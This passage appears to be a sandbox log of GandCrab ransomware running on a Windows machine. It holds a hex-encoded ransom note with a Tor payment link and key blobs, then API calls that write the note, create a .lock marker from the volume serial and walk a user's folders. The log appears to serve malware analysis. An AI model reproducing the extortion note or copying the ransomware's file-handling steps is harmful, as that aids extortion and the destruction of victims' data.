x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0091.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0091.249] CloseHandle (hObject=0x2b4) returned 1 [0091.249] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.249] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.249] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x24, wMilliseconds=0x238)) [0091.249] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.250] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.250] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.250] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock") returned 86 [0091.250] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0091.250] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.250] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\") returned 62 [0091.251] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*" [0091.251] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503378 [0091.251] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.251] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0091.251] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.251] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 